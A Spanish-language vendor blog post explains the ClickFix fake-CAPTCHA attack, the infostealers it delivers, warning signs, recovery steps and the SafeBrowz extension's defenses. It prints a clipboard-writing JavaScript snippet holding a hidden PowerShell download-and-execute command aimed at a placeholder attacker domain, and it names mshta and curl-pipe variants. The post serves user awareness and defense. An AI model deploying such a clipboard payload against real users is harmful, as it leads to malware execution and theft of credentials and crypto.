Qué es ClickFix

ClickFix es un kit de ingeniería social disfrazado de CAPTCHA. Llegas a una página que parece un desafío normal de "verifica que eres humano". Logo de Cloudflare Turnstile, la casilla de verificación familiar, quizás una barra de progreso. Haces clic. En lugar de resolver el CAPTCHA, la página dice que la verificación falló y te muestra tres pasos para "arreglarlo":

  1. Presiona Win + R en tu teclado
  2. Presiona Ctrl + V para pegar
  3. Presiona Enter

Lo que la página no te dice es que al hacer clic en el botón falso del CAPTCHA, copió silenciosamente un comando de PowerShell a tu portapapeles. El cuadro de diálogo Ejecutar se abre. Pegas. Presionas Enter. Windows lanza PowerShell, se conecta a un servidor controlado por el atacante, descarga un payload y lo ejecuta bajo tu cuenta de usuario. Sin aviso. Sin advertencia. Sin descarga. Todo el ataque tarda unos ocho segundos desde "verifica que eres humano" hasta el compromiso total del sistema.

La variante para macOS usa Terminal en lugar de Ejecutar, y la de Linux usa prompts estilo xdotool, pero el patrón es idéntico. Una página de confianza te engaña para que ejecutes código que no escribiste.

Por qué todos los antivirus fallan ante esto

La protección de endpoints tradicional busca dos cosas: firmas de malware conocidas y comportamiento sospechoso de procesos. ClickFix derrota ambas por diseño.

No hay ningún archivo malicioso en el disco cuando comienza el ataque. El payload de entrega vive en una cadena de texto copiada al portapapeles. El proceso que lo ejecuta es powershell.exe, un binario firmado por Microsoft que está en la lista de permitidos de todos los antivirus lanzados en los últimos quince años. Cuando PowerShell descarga la segunda etapa, a menudo la carga directamente en memoria con Invoke-Expression o reflection.Assembly.Load, de modo que el malware nunca toca el sistema de archivos. La carga sin archivos significa que no hay ningún archivo que escanear.

El clavo final es el consentimiento. El usuario escribió las teclas. El usuario pegó el comando. El usuario presionó Enter. Desde la perspectiva del sistema operativo, esto es un administrador legítimo ejecutando un intérprete legítimo. No hay exploit, no hay escalada de privilegios, no hay CVE que parchear. No puedes escribir una firma para "el usuario siguió instrucciones en una página web". Por eso ClickFix pasó de ser una curiosidad de investigación en 2024 a aproximadamente el 40 por ciento de todos los incidentes de malware entregado por navegador rastreados en 2026.

El kit de script exacto

La mayoría de las páginas de destino de ClickFix están construidas con las mismas pocas plantillas, vendidas o filtradas en Telegram y mercados de foros. El patrón estructural es predecible una vez que has visto uno. La página carga una carcasa de CAPTCHA convincente, y cuando el usuario hace clic en cualquier lugar dentro de la caja del desafío, un pequeño script se dispara:

const cmd = "powershell -w hidden -c \"iex (iwr 'https://[attacker-domain]/x.ps1')\"";
navigator.clipboard.writeText(cmd);

La llamada a navigator.clipboard.writeText() es todo el truco. Los navegadores permiten escrituras en el portapapeles en gestos del usuario sin un aviso de permiso, lo cual está bien para los botones de copia en sitios normales pero es una cobertura perfecta aquí. En el momento en que el usuario hace clic en el CAPTCHA falso, su portapapeles es sobreescrito.

Una segunda capa desvanece el panel de "verificación fallida" después de un breve retraso, generalmente entre 600 y 1200 milisegundos. Ese retraso es deliberado. Hace que el fallo parezca un CAPTCHA real con tiempo agotado en lugar de un falso instantáneo. El panel de instrucciones luego guía al usuario a través de Win+R, Ctrl+V, Enter, a veces con una cadena falsa de "ID de robot" como ray-id: 7a3f... añadida al comando para hacer que el texto pegado parezca entrada de diagnóstico en lugar de un comando de shell.

Las variantes intercambian powershell por mshta, curl | iex o blobs codificados en base64. Los de base64 se leen como texto sin sentido en el cuadro de diálogo Ejecutar, lo que en realidad ayuda al atacante porque los usuarios confundidos tienen más probabilidades de seguir la instrucción "simplemente presiona Enter" sin leer.

Quiénes ejecutan estas campañas

ClickFix no es un solo grupo. Es un mecanismo de entrega usado por docenas de afiliados que alimentan a un puñado de familias de malware. El lado del tráfico funciona a través de sitios de WordPress comprometidos, malvertising en redes publicitarias con revisión débil, envenenamiento de SEO en consultas largas de cripto y descarga de software, y cada vez más a través de enlaces falsos de invitación de Google Meet y Zoom.

La rotación de dominios es agresiva. Una campaña típica consume un dominio nuevo cada 24 a 72 horas para mantenerse por delante de las listas de bloqueo. Los dominios suelen estar registrados a través de revendedores que aceptan cripto, alojados en proveedores a prueba de balas y protegidos por Cloudflare para ocultar el origen.

En el lado del payload, las familias más comunes que vemos entregadas por páginas de ClickFix son Vidar, RedLine, Lumma, StealC y ACR Stealer. Todos son info-stealers. Se alquilan como servicio, típicamente por 150 a 500 USD al mes por operador, lo que mantiene baja la barrera de entrada. La misma página de ClickFix puede entregar diferentes payloads según la geolocalización, la huella digital del navegador o el afiliado que esté dirigiendo tráfico en esa hora.

Cómo se monetiza el malware

Una vez que se ejecuta el one-liner de PowerShell, el info-stealer hace su trabajo en menos de un minuto. Apunta a una lista predecible de datos de alto valor:

  • Contraseñas guardadas de Chrome, Firefox, Edge, Brave, Opera y todos los forks de Chromium
  • Cookies de sesión, que son más valiosas que las contraseñas porque eluden la autenticación de dos factores
  • Almacenamiento de extensiones de billetera del navegador: MetaMask, Phantom, Rabby, Rainbow, Keplr y más de treinta otros
  • Archivos de billetera de escritorio: Exodus, Electrum, Atomic, Ledger Live
  • Tokens de sesión de Discord, Telegram y Steam
  • Datos de autocompletar incluyendo tarjetas de crédito y direcciones
  • Capturas de pantalla del escritorio en el momento de la infección

Los datos robados se empaquetan en un "log" y se suben a un servidor de comando y control. Desde allí toma uno de tres caminos. Las billeteras cripto con saldos son drenadas en minutos, generalmente por un bot de drenaje automatizado que barre cualquier billetera caliente con frases semilla en texto plano en el almacenamiento de extensiones. Las cookies de sesión para cuentas de alto valor como correo electrónico, exchanges y proveedores de nube se revenden individualmente en mercados como Russian Market o Genesis por precios de 5 a 500 USD cada una. Los logs masivos, a menudo con credenciales de cientos de sitios por víctima, se venden en paquetes a operadores de credential stuffing que los prueban contra sitios bancarios, de streaming y de compras para apropiación de cuentas.

Una sola infección exitosa de ClickFix en un usuario de cripto vale en promedio 2800 USD para el operador según los datos de drenaje que hemos rastreado. En un usuario no cripto es más cercano a 40 USD a través de reventa de credenciales. Ambas cifras son suficientemente altas para que el ataque sea rentable a escala.

Las 4 señales de que estás viendo ClickFix ahora mismo

  1. Las instrucciones del CAPTCHA involucran Win+R, Terminal o PowerShell. Ningún CAPTCHA legítimo en la historia de internet te ha pedido que abras un shell. Cloudflare, Google reCAPTCHA, hCaptcha y Turnstile funcionan dentro de la página. Si un paso de verificación humana te dice que presiones atajos de teclado que abren diálogos del sistema, cierra la pestaña.
  2. La página dice que la verificación falló y te pide que ejecutes un script. Los CAPTCHAs reales fallan en silencio o vuelven a intentarlo. Nunca te entregan un comando y dicen "pega esto para demostrar que eres humano". Esa formulación sola es una señal de ClickFix.
  3. La URL es un doppelganger de un servicio legítimo que en realidad no usas. Los señuelos comunes de ClickFix imitan páginas de desafío de Cloudflare, uniones a Google Meet, actualizaciones de Zoom, verificaciones de DocuSign y prompts falsos de actualización de navegador. Si llegaste a un "desafío de Cloudflare" sin visitar un sitio que use Cloudflare, algo está mal.
  4. Tu portapapeles de repente contiene un comando de shell. Si alguna vez llegas a una página sospechosa y quieres verificar, abre el Bloc de notas y pega. Si lo que sale comienza con powershell, mshta, cmd /c, curl o una larga cadena base64, fuiste objetivo. No lo pegues en ningún otro lugar. Borra tu portapapeles y cierra la página.

Qué hacer si ya lo ejecutaste

Asume compromiso total. Trabaja en estos siete pasos en orden, desde un dispositivo diferente si es posible.

  1. Desconecta la máquina infectada de internet. Desconecta el cable ethernet o apaga el Wi-Fi. Esto detiene cualquier exfiltración de datos activa y corta el canal C2 antes de que se haga más daño.
  2. Ejecuta un análisis completo con dos motores. Malwarebytes más el análisis sin conexión de Windows Defender es una buena combinación gratuita. Los info-stealers a menudo incluyen persistencia que solo un análisis completo en tiempo de arranque detectará.
  3. Cambia cada contraseña que usaste en las últimas 24 horas. Comienza con tu correo electrónico principal, porque quien tenga ese puede restablecer todo lo demás. Luego banca, exchanges de cripto, contraseña maestra del gestor de contraseñas y cualquier cuenta con datos de pago. Usa el dispositivo limpio, no el infectado.
  4. Revoca todas las sesiones activas. La mayoría de los servicios tienen una opción "cerrar sesión en todos los dispositivos" en la configuración de seguridad. Hazlo para Google, Apple, Microsoft, Discord, tu gestor de contraseñas y cada exchange que uses. Las cookies robadas antes de que cambiaras la contraseña siguen funcionando hasta que se cierren las sesiones.
  5. Mueve cualquier cripto a una billetera nueva. Genera una nueva frase semilla en un dispositivo limpio, idealmente hardware si tienes uno disponible. Transfiere fondos fuera de cualquier billetera caliente que estuviera en la máquina comprometida. No reutilices la frase semilla antigua, nunca, incluso después de una reinstalación limpia. Asume que está en una base de datos en un servidor de stealer.
  6. Revisa las transacciones bancarias y cripto durante las próximas 48 horas. Activa todas las alertas de fraude que tu banco ofrezca. Monitorea las direcciones on-chain para detectar salidas inusuales. Contacta a tu banco de forma preventiva si ingresaste datos de tarjeta en la máquina infectada durante esa ventana.
  7. Considera una reinstalación completa del SO. Si la cuenta comprometida tiene acceso a algo importante, formatea la máquina. Un SO limpio reinstalado es la única manera de estar seguro de que no queda ninguna persistencia. Haz una copia de seguridad de documentos en medios externos, escanéalos por separado y restáuralos después de la reinstalación en lugar de usar una imagen del sistema.

Para la recuperación específica de cripto, consulta nuestra guía paso a paso sobre qué hacer cuando tu frase semilla ha sido robada.

Cómo SafeBrowz detecta ClickFix específicamente

Construimos tres capas independientes contra esta clase de ataque porque cualquier defensa única puede ser eludida. Las tres se ejecutan en la extensión gratuita, y una solo en Premium.

Capa 1: Lista de bloqueo de dominios. Cada dominio de entrega conocido de ClickFix, servidor de preparación y endpoint de comando y control que rastreamos se envía a la extensión en un ciclo de actualización de seis horas. La lista proviene de nuestros propios crawlers, feeds de amenazas de socios y envíos de la comunidad. Si una página se carga desde un dominio malicioso conocido, la solicitud se bloquea antes de que el HTML se renderice. Para contexto sobre cómo funciona la detección de dominios en general, consulta nuestro artículo sobre cómo saber si un sitio web es estafa.

Capa 2: Detección de patrones de contenido. Las listas de bloqueo se retrasan respecto a dominios nuevos por horas o días. Para capturar páginas que nunca hemos visto, la extensión analiza el contenido de la página antes de renderizar para detectar huellas de ClickFix: el lenguaje de instrucción Win+R en cualquiera de los más de 100 idiomas soportados, llamadas a navigator.clipboard.writeText dentro de manejadores de clic, paneles falsos de "verificación fallida" y combinaciones de branding de CAPTCHA con texto de comando de shell. El análisis de contenido con IA se ejecuta en todo lo sospechoso y lo marca incluso cuando la página no coincide con una plantilla conocida. Esto captura variantes de ClickFix zero-day en la naturaleza.

Capa 3: Guardia contra secuestro de portapapeles (Premium). La opción nuclear. Cualquier página que intente escribir en el portapapeles sin un clic claramente intencional en un botón de copia visible es bloqueada y se muestra al usuario lo que la página intentó copiar. Esto detiene toda la cadena del ataque en el momento exacto en que el comando malicioso tocaría tu portapapeles, independientemente de la reputación del dominio o los patrones de contenido.

El análisis técnico más detallado de nuestras defensas contra ClickFix está en la página de protección ClickFix.

Preguntas frecuentes

¿SafeBrowz funciona en Mac?

Sí. La extensión bloquea el sitio de entrega de ClickFix en la capa del navegador, lo que funciona igual en Mac, Windows, Linux y ChromeOS. El payload de malware suele apuntar a Windows con mayor frecuencia, pero estás protegido de llegar a la página en primer lugar independientemente del sistema operativo.

¿Es suficiente el nivel gratuito?

Para la mayoría de los usuarios, sí. La lista de bloqueo y las capas de detección de patrones de contenido capturan la gran mayoría de las páginas de ClickFix y son gratuitas para siempre. La guardia contra secuestro de portapapeles en Premium es la última línea de defensa para usuarios que quieren una protección doble, especialmente cualquiera que tenga cripto significativo.

Visité una página de ClickFix pero no ejecuté nada. ¿Estoy seguro?

Sí. Simplemente ver la página no hace nada. El ataque requiere que presiones Win+R, pegues y presiones Enter. Si cerraste la pestaña sin seguir las instrucciones, no se ejecutó ningún código en tu máquina. Borra tu portapapeles por precaución y continúa.

¿Qué tan común es ClickFix comparado con el phishing tradicional?

En 2026, aproximadamente el 40 por ciento de los incidentes de malware entregado por navegador que rastreamos involucran una variante de ClickFix. El phishing de credenciales tradicional sigue siendo mayor en general, pero ClickFix es el que crece más rápido porque derrota al antivirus y la autenticación de dos factores simultáneamente. Se espera que siga aumentando.

¿Por qué los navegadores no bloquean esto de forma nativa?

Porque técnicamente nada en el navegador está roto. El usuario hizo clic en un botón. La página escribió en el portapapeles en un gesto del usuario, lo cual está permitido. El usuario luego abrió su propio shell y pegó. Desde la perspectiva de Chrome, cada paso es una acción legítima. La defensa tiene que vivir una capa más arriba, que es donde importa una extensión dedicada.

Instala SafeBrowz gratis. Multinavegador, más de 500 marcas rastreadas, análisis de contenido con IA en más de 100 idiomas, y sí, las defensas contra ClickFix descritas arriba. Sin necesidad de cuenta.

Chrome Añadir a Chrome Firefox Añadir a Firefox Edge Añadir a Edge

Artículos relacionados: Resumen de protección ClickFix · Cómo saber si un sitio web es estafa · Frase semilla robada: guía de recuperación · Todos los artículos · SafeBrowz inicio